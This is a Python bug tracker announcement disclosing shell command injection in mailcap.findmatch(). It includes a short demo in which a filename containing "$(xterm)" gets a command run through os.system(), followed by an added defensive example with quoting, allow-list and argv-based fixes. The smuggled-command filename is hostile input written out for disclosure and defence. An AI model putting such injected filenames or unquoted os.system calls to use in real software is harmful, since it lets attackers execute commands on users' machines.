[New-bugs-announce] [issue24778] mailcap.findmatch() ........ Shell Command Injection in filename
Bernd Dietzel
report at bugs.python.org
Sun Aug 2 10:25:07 CEST 2015
New submission from Bernd Dietzel:
If the filename contains shell commands, they will be executed when it
is passed to os.system() as described in the docs.
The filename should be quoted with quote(filename) to fix the bug.
https://docs.python.org/2/library/mailcap.html
"mailcap.findmatch(caps, MIMEtype[, key[, filename[, plist]]])
Return a 2-tuple; the first element is a string containing the
command line to be executed
(which can be passed to os.system()),
......"
Exploit demo which runs xterm but should not:
=============================
import mailcap
import os

d = mailcap.getcaps()
# The filename is substituted into the mailcap command template unquoted
commandline, MIMEtype = mailcap.findmatch(d, "text/*", filename="'$(xterm);#.txt")
# commandline = "less ''$(xterm);#.txt'"
os.system(commandline)
# xterm starts
=============================
By the way ... please do not use os.system() in your code; it makes it unsafe.
Best regards
Bernd Dietzel
Germany
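The report's payload and its proposed fix, worked through as an added example that is not code from the report or from CPython's mailcap module. It re-implements the `%s` substitution as plain text replacement (a simplification of what findmatch does) and then shows three defender-side alternatives: shell-quoting the filename as the reporter suggests, refusing filenames with shell metacharacters (the approach the standard library later took in 3.11, approximated here with an assumed allow-list regex), and bypassing the shell altogether by building an argv for subprocess. The template strings, the `echo` stand-in viewer and all function names are constructed for this example.

```python
"""
Added example (not code from the bug report or CPython): keeping a filename
from being interpreted by the shell when it is spliced into a mailcap-style
command template such as "less %s".
"""
import re
import shlex
import subprocess

# Constructed input: the payload from the report above.  It is only ever
# handled as a string here; the demo never runs it through a shell.
PAYLOAD = "'$(xterm);#.txt"

# Assumed allow-list in the spirit of the check CPython added in 3.11:
# anything outside word characters and a little punctuation is unsafe.
_UNSAFE = re.compile(r"[^\w@+=:,./-]")


def naive_substitute(template: str, filename: str) -> str:
    """What the report describes: raw text substitution of %s, no quoting."""
    return template.replace("%s", filename)


def shell_words(command: str) -> list[str]:
    """Tokenize a command string the way a POSIX shell would (quotes honoured)."""
    return shlex.split(command)


def is_safe_filename(filename: str) -> bool:
    """Reject names containing shell metacharacters instead of escaping them."""
    return _UNSAFE.search(filename) is None


def build_shell_command(template: str, filename: str) -> str:
    """The reporter's proposed fix: shell-quote the filename before substitution.

    Correct only for a POSIX sh template whose %s is not already wrapped in
    quotes; the filename then arrives as one literal argument.
    """
    return template.replace("%s", shlex.quote(filename))


def build_argv(template: str, filename: str) -> list[str]:
    """Avoid the shell entirely: tokenize the template and swap in the filename.

    The result is meant for subprocess.run(argv) with shell=False, so the
    filename is never parsed as shell syntax at all.
    """
    return [filename if tok == "%s" else tok for tok in shlex.split(template)]


def run_viewer(template: str, filename: str) -> str:
    """Run the viewer without a shell and return its stdout."""
    result = subprocess.run(build_argv(template, filename),
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    print("naive  :", naive_substitute("less '%s'", PAYLOAD))
    print("quoted :", build_shell_command("less %s", PAYLOAD))
    print("tokens :", shell_words(build_shell_command("less %s", PAYLOAD)))
    print("argv   :", build_argv("less %s", PAYLOAD))
    print("safe?  :", is_safe_filename(PAYLOAD), is_safe_filename("report.txt"))
    # echo stands in for the viewer so the demo prints the argument it received
    print("viewer :", run_viewer("echo %s", PAYLOAD).rstrip("\n"))
```

The tokenized form of the quoted command shows the difference directly: with naive substitution the shell sees an empty string, a command substitution and a comment; after `shlex.quote` it sees `less` followed by the whole payload as a single argument. The argv variant is the one to prefer in new code, since it removes the shell from the picture rather than trying to out-quote it.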
----------
components: Library (Lib)
files: screenshot.png
messages: 247857
nosy: TheRegRunner
priority: normal
severity: normal
status: open
title: mailcap.findmatch() ........ Shell Command Injection in filename
type: security
versions: Python 2.7
Added file: http://bugs.python.org/file40099/screenshot.png
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24778>
_______________________________________